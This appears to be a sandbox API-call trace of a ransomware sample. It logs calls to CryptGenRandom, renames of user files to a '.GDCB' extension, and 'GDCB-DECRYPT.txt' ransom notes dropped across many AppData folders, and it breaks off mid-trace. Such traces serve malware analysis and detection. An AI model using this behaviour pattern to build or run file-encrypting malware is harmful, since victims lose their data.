Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\CLR_v4.0\ngen.log, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\CLR_v4.0\ngen.log, size = 1048576, size_out = 756 True 1
Fn
Data
File Move source_filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\CLR_v4.0\ngen.log, destination_filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\CLR_v4.0\ngen.log.GDCB True 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\CLR_v4.0\UsageLogs\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Get Info filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\CLR_v4.0\UsageLogs\mmc.exe.log, type = file_attributes False 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\CLR_v4.0\UsageLogs\mmc.exe.log, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
File Get Info filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\CLR_v4.0\UsageLogs\NGenTask.exe.log, type = file_attributes False 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\CLR_v4.0\UsageLogs\NGenTask.exe.log, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
File Get Info filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log, type = file_attributes False 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
File Get Info filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\CLR_v4.0\UsageLogs\sdiagnhost.exe.log, type = file_attributes False 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\CLR_v4.0\UsageLogs\sdiagnhost.exe.log, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\CLR_v4.0_32\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Get Info filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\CLR_v4.0_32\ngen.log, type = file_attributes True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\CLR_v4.0_32\ngen.log, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\CLR_v4.0_32\ngen.log, size = 1048576, size_out = 751 True 1
Fn
Data
File Move source_filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\CLR_v4.0_32\ngen.log, destination_filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\CLR_v4.0_32\ngen.log.GDCB True 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\CLR_v4.0_32\UsageLogs\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Get Info filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\CLR_v4.0_32\UsageLogs\NGenTask.exe.log, type = file_attributes False 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\CLR_v4.0_32\UsageLogs\NGenTask.exe.log, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Credentials\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Event Viewer\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Feeds\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Feeds\\GDCB-DECRYPT.txt, size = 2774 True 1
Fn
Data
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Feeds\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Feeds Cache\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Feeds Cache\6YGNCJW8\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Feeds Cache\FZW2QEOY\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Feeds Cache\O593F7EE\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Feeds Cache\PJ5H3B54\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\FORMS\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\FORMS\\GDCB-DECRYPT.txt, size = 2774 True 1
Fn
Data
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\GameDVR\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\GameDVR\\GDCB-DECRYPT.txt, size = 2774 True 1
Fn
Data
File Get Info filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\GameDVR\KnownGameList.bin, type = file_attributes True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\GameDVR\KnownGameList.bin, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\InputPersonalization\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\InputPersonalization\TrainedDataStore\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Internet Explorer\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Get Info filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Internet Explorer\brndlog.txt, type = file_attributes False 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Internet Explorer\brndlog.txt, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Internet Explorer\DomainSuggestions\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Internet Explorer\DOMStore\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Internet Explorer\EmieBrowserModeList\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Internet Explorer\EmieSiteList\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Internet Explorer\EmieUserList\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Get Info filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Internet Explorer\ie4uinit-ClearIconCache.log, type = file_attributes False 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Internet Explorer\ie4uinit-ClearIconCache.log, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
File Get Info filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Internet Explorer\ie4uinit-UserConfig.log, type = file_attributes False 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Internet Explorer\ie4uinit-UserConfig.log, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Internet Explorer\IECompatData\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Internet Explorer\IEFlipAheadCache\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Internet Explorer\imagestore\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Internet Explorer\Recovery\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Internet Explorer\TabRoaming\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Internet Explorer\Tiles\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Internet Explorer\Tiles\pin-314712940\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Internet Explorer\Tiles\pin7226654530\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Internet Explorer\Tracking Protection\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Internet Explorer\VersionManager\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Media Player\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Media Player\Sync Playlists\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Media Player\Transcoded Files Cache\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Office\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Office\\GDCB-DECRYPT.txt, size = 2774 True 1
Fn
Data
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Office\16.0\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Office\16.0\BackstageInAppNavCache\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Get Info filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Office\16.0\excel.exe_Rules.xml, type = file_attributes False 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Office\16.0\excel.exe_Rules.xml, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
File Get Info filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Office\16.0\officec2rclient.exe_Rules.xml, type = file_attributes False 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Office\16.0\officec2rclient.exe_Rules.xml, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
File Get Info filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml, type = file_attributes False 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
